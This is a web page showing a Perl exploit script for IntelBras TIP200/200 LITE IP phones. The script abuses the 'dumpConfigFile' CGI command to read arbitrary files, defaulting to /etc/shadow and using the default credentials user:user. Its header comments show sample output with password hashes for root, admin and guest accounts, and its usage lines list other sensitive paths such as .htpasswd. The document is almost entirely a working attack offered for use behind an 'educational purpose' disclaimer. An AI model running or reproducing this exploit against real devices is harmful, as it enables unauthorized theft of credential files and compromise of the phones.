扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 |
#!/usr/bin/perl -w # #IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read # #Todor Donev 2019 (c) <todor.donev at gmail.com> # # #Disclaimer: #This or previous programs are for Educational purpose ONLY. Do not use it without permission. #The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages #caused by direct or indirect use of theinformation or functionality provided by these programs. #The author or any Internet providerbears NO responsibility for content or misuse of these programs #or any derivatives thereof. By using these programs you accept the factthat any damage (dataloss, #system crash, system compromise, etc.) caused by the useof these programs are not Todor Donev's #responsibility. # #Use them at your own risk! # #[test@localhost intelbras]$ perl intelbras_telefone_ip_tip_200_200_lite.pl # ## IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read ## ======================================================================================================== ## Author: Todor Donev 2019 (c) <todor.donev at gmail.com> ## ======================================================================================================== ## >Authorization => Basic dXNlcjp1c2Vy ## >User-Agent => Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC) ## >Content-Type => application/x-www-form-urlencoded ## <Accept-Ranges => bytes ## <Server => SIPPhone ## <Content-Type => text/html;charset=UTF-8 ## <Expires => -1 ## <Client-Date => Sun, 01 Sep 2019 13:37:00 GMT ## <Client-Peer => 192.168.1.1 ## <Client-Response-Num => 1 ## ======================================================================================================== #root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7::: #admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7::: #guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7::: # ## ======================================================================================================== #[test@localhost intelbras]$ # #Simple Mode: #perl intelbras_telefone_ip_tip_200_200_lite.pl | grep -v "^#" # use strict; use v5.10; use HTTP::Request; use LWP::UserAgent; use WWW::UserAgent::Random; my $host = shift || ''; my $file = shift || '/etc/shadow'; my $user = shift || 'user'; my $pass = shift || 'user'; print " # IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 \'dumpConfigFile\' Pre-Auth Remote Arbitrary File Read # ======================================================================================================== # Author: Todor Donev 2019 (c) <todor.donev at gmail.com> "; if ($host !~ m/^http/){ print"# e.g. perl $0 https://target:port/ /etc/shadow user user # e.g. perl $0 https://target:port/ /phone/factory/user.ini user user # e.g. perl $0 https://target:port/ /phone/config/WebItemsLevel.cfg user user # e.g. perl $0 https://target:port/ /phone/config/.htpasswd user user "; exit; } my $user_agent = rand_ua("browsers"); my $browser= LWP::UserAgent->new( protocols_allowed => ['http', 'https'], ssl_opts => { verify_hostname => 0 } ); $browser->timeout(10); $browser->agent($user_agent); my $payload = $host."/cgi-bin/cgiServer.exx?command=dumpConfigFile(\"$file\")"; my $request = HTTP::Request->new (GET => $payload,[ Content_Type => "application/x-www-form-urlencoded"], " "); $request->authorization_basic($user, $pass); print "# ========================================================================================================\n"; my $response = $browser->request($request); say "# >$_ => ", $request->header($_) for$request->header_field_names; say "# <$_ => ", $response->header($_) for$response->header_field_names; print "# 401 Unauthorized! Wrong Username or Password!\n" and exit if ($response->code eq '401'); print "# ========================================================================================================\n"; if ($response->content =~ m/$file/g){ my $content = $response->content; $content =~ s/$file//g; $content =~ s/^\n+//; print $content; print "\n# ========================================================================================================\n"; exit; } else { print "# Exploit failed or full path is wrong..\n"; exit; } |
体验盒子
